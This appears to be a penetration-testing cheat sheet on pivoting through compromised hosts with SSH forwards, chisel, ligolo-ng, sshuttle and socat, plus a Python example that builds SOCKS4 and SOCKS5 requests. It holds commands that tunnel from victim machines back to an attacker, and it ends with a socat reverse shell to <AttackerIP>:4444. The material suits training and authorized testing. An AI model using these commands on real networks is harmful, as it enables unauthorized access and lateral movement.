Network Pivoting & Tunneling
1. Visualizing the Pivot
- Local Port Forward: Access a specific port on a target (Attacker -> Target:80).
- Remote Port Forward: Expose a local port to the target (Target -> Attacker:4444).
- Dynamic Port Forward: SOCKS proxy to access any port on the target network.
2. SSH Tunneling (The Classic)
No external tools required, just SSH.
Local Forward (-L)
"I want to access the internal webserver on 10.10.10.5:80, via the jumpbox."
```bash
ssh -L 8000:10.10.10.5:80 user@jumpbox
# Access via http://localhost:8000
```
Remote Forward (-R)
"I want the target to connect back to my listener on port 4444."
```bash
ssh -R 4444:127.0.0.1:4444 user@jumpbox
# On target: nc 127.0.0.1 4444 -> connects to your machine
```
Dynamic Forward (-D)
"I want to scan the whole internal network."
```bash
ssh -D 9050 user@jumpbox
# Edit /etc/proxychains4.conf -> socks4 127.0.0.1 9050
# -sT (full connect) is required: raw-packet scans such as SYN cannot traverse a SOCKS proxy
proxychains nmap -sT -Pn 10.10.10.5
```
3. Chisel (The HTTP Tunnel)
Great for getting through firewalls that only allow HTTP/HTTPS.
Server (Attacker)
```bash
# Start server on port 8000, allow reverse tunnels
./chisel server -p 8000 --reverse
```
Client (Victim)
```bash
# Connect back to attacker
./chisel client <AttackerIP>:8000 R:socks
```
- This creates a SOCKS proxy on the attacker machine (default port 1080).
- Use with proxychains (socks5 127.0.0.1 1080).
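Both the `ssh -D` and chisel sections end with a proxychains line, and the difference between `socks4` and `socks5` there is a protocol difference. The following is an added example (not from this cheat sheet or from either tool) that builds the exact CONNECT messages a proxychains-wrapped client sends through a dynamic forward and decodes the proxy's reply; the addresses are constructed for illustration. It shows why SOCKS4 forces the client to resolve names itself (a DNS artifact a monitor would see), while SOCKS5 can hand the hostname to the proxy.

```python
import ipaddress
import struct

# Sample addresses below are constructed; they are not from the cheat sheet.
SOCKS5_REPLY_CODES = {0: "succeeded", 1: "general failure", 2: "not allowed",
                      3: "network unreachable", 4: "host unreachable",
                      5: "connection refused", 6: "TTL expired",
                      7: "command not supported", 8: "address type not supported"}

def socks4_connect(ip, port, userid=b""):
    """SOCKS4 CONNECT: VN=4, CD=1, DSTPORT, DSTIP, USERID, NUL.
    Only an IPv4 literal fits, so the client resolves names locally."""
    packed_ip = ipaddress.IPv4Address(ip).packed
    return struct.pack("!BBH4s", 4, 1, port, packed_ip) + userid + b"\x00"

def socks5_greeting():
    """Method negotiation: version 5, one method offered, 0x00 = no auth."""
    return b"\x05\x01\x00"

def socks5_connect(host, port):
    """SOCKS5 CONNECT (RFC 1928): VER, CMD=1, RSV, ATYP, DST.ADDR, DST.PORT.
    ATYP 1 = IPv4 literal; ATYP 3 = domain name, resolved by the proxy."""
    try:
        addr = b"\x01" + ipaddress.IPv4Address(host).packed
    except ipaddress.AddressValueError:
        name = host.encode()
        addr = b"\x03" + bytes([len(name)]) + name
    return b"\x05\x01\x00" + addr + struct.pack("!H", port)

def parse_socks5_reply(data):
    """Decode the proxy's reply: (status text, bound address, bound port)."""
    ver, rep, _rsv, atyp = data[:4]
    if ver != 5:
        raise ValueError("not a SOCKS5 reply")
    if atyp == 1:
        addr, rest = str(ipaddress.IPv4Address(data[4:8])), data[8:]
    elif atyp == 3:
        n = data[4]
        addr, rest = data[5:5 + n].decode(), data[5 + n:]
    else:
        raise ValueError("unsupported ATYP %d" % atyp)
    (port,) = struct.unpack("!H", rest[:2])
    return SOCKS5_REPLY_CODES.get(rep, "unknown"), addr, port
```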
4. Ligolo-ng (The Modern Way)
Uses TUN interfaces for true VPN-like pivoting (better than SOCKS).
Setup (Attacker)
- Create Interface:
```bash
sudo ip tuntap add user <username> mode tun ligolo
sudo ip link set ligolo up
```
- Start Proxy:
```bash
./proxy -selfcert
```
Setup (Victim)
- Connect Agent:
```bash
./agent -connect <AttackerIP>:11601 -ignore-cert
```
Routing (Attacker)
- Select session in proxy.
- Add Route:
```bash
# Inside the proxy console: list sessions, pick the agent, start the tunnel
session
1
start
# On the host terminal
sudo ip route add 10.10.10.0/24 dev ligolo
```
Now you can ping, nmap (SYN scan works!), and access ports directly without proxychains.
5. SSHuttle (The Lazy VPN)
Linux-only. Doesn't require root on victim, just Python.
```bash
# Route all traffic to 10.10.10.0/24 through jumpbox
sshuttle -r user@jumpbox 10.10.10.0/24
```
- Pro: No setup on victim.
- Con: TCP only (no UDP/ICMP).
6. Socat (The Pipe)
Binary-to-binary or Port-to-Port relay.
- Forward Local 8080 to Target 80:
```bash
socat TCP4-LISTEN:8080,fork TCP4:10.10.10.5:80
```
- Upgrade Shell:
```bash
# On the victim
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<AttackerIP>:4444
```